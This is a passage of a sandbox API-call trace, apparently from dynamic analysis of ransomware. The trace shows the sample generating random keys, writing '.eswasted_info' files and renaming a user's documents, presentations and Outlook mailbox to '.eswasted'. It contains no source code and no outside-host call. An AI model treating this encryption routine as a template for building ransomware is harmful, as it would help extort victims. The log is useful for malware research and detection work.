SetEndOfFile (hFile=0xf8) returned 1 [0076.246] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.246] lstrcpyW (in: lpString1=0x4ec062, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HlpkTPRO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hlpktpro.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HlpkTPRO.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hlpktpro.docx.eswasted")) returned 1 [0076.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HlpkTPRO.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hlpktpro.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0076.249] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0076.252] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.253] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.253] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.253] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.253] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.253] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.262] SetEndOfFile (hFile=0xf8) returned 1 [0076.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.264] CloseHandle (hObject=0xf8) returned 1 [0076.317] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0076.317] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.318] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.318] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lc6p.pdf") returned 52 [0076.318] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x272) returned 0x4e1368 [0076.318] lstrcpyW (in: lpString1=0x4e13d0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.318] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0076.318] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.319] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0076.319] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lc6p.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lc6p.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.319] WriteFile (in: hFile=0xf8, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.320] SetEndOfFile (hFile=0xf8) returned 1 [0076.320] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.320] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0076.320] lstrcpyW (in: lpString1=0x4e13d0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lc6p.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lc6p.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lc6p.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lc6p.pdf.eswasted")) returned 1 [0076.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lc6p.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lc6p.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.400] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.403] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.404] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.404] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.404] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.406] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.406] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.414] SetEndOfFile (hFile=0xf8) returned 1 [0076.417] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0076.417] CloseHandle (hObject=0xf8) returned 1 [0076.418] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0076.418] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.419] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.419] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.419] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxjaV7t4iu ni6az.docx") returned 65 [0076.419] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4e1368 [0076.419] lstrcpyW (in: lpString1=0x4e13ea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.419] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0076.419] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.420] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0076.420] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxjaV7t4iu ni6az.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxjav7t4iu ni6az.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.421] WriteFile (in: hFile=0xf8, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.421] SetEndOfFile (hFile=0xf8) returned 1 [0076.422] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.422] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0076.422] lstrcpyW (in: lpString1=0x4e13ea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxjaV7t4iu ni6az.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxjav7t4iu ni6az.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxjaV7t4iu ni6az.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxjav7t4iu ni6az.docx.eswasted")) returned 1 [0076.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxjaV7t4iu ni6az.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxjav7t4iu ni6az.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.423] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.424] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.424] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.424] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.425] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.425] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.425] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.433] SetEndOfFile (hFile=0xf8) returned 1 [0076.436] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0076.436] CloseHandle (hObject=0xf8) returned 1 [0076.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0076.550] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.551] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.551] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oKCfH7.pptx") returned 55 [0076.551] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4e1368 [0076.551] lstrcpyW (in: lpString1=0x4e13d6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.551] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.551] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.552] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.552] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oKCfH7.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\okcfh7.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.553] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.554] SetEndOfFile (hFile=0xf8) returned 1 [0076.554] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.554] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.554] lstrcpyW (in: lpString1=0x4e13d6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oKCfH7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\okcfh7.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oKCfH7.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\okcfh7.pptx.eswasted")) returned 1 [0076.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oKCfH7.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\okcfh7.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.555] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.557] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.558] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.558] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.558] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.559] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.559] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.567] SetEndOfFile (hFile=0xf8) returned 1 [0076.569] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.569] CloseHandle (hObject=0xf8) returned 1 [0076.571] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0076.571] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.572] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.572] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQG0fm.pptx") returned 55 [0076.572] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4e1368 [0076.572] lstrcpyW (in: lpString1=0x4e13d6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.572] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.572] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.573] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.573] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQG0fm.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqg0fm.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.574] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.575] SetEndOfFile (hFile=0xf8) returned 1 [0076.575] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.575] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.575] lstrcpyW (in: lpString1=0x4e13d6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQG0fm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqg0fm.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQG0fm.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqg0fm.pptx.eswasted")) returned 1 [0076.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OQG0fm.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqg0fm.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.576] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.577] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.578] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.578] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.579] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.580] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.580] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.591] SetEndOfFile (hFile=0xf8) returned 1 [0076.729] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.729] CloseHandle (hObject=0xf8) returned 1 [0076.731] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0076.731] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.732] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.732] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0076.732] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f6210 [0076.732] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.732] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.732] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.733] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.733] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.733] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.734] SetEndOfFile (hFile=0xf8) returned 1 [0076.734] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.734] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.734] lstrcpyW (in: lpString1=0x4f62b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted")) returned 1 [0076.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.735] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.940] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.941] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0076.941] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.941] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.942] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.942] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.950] SetEndOfFile (hFile=0xf8) returned 1 [0076.952] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.952] CloseHandle (hObject=0xf8) returned 1 [0076.954] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0076.954] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.955] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.955] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RJYwxxDNS.pptx") returned 58 [0076.955] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4e1368 [0076.955] lstrcpyW (in: lpString1=0x4e13dc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.955] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.955] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.956] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.956] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.956] CreateFileW 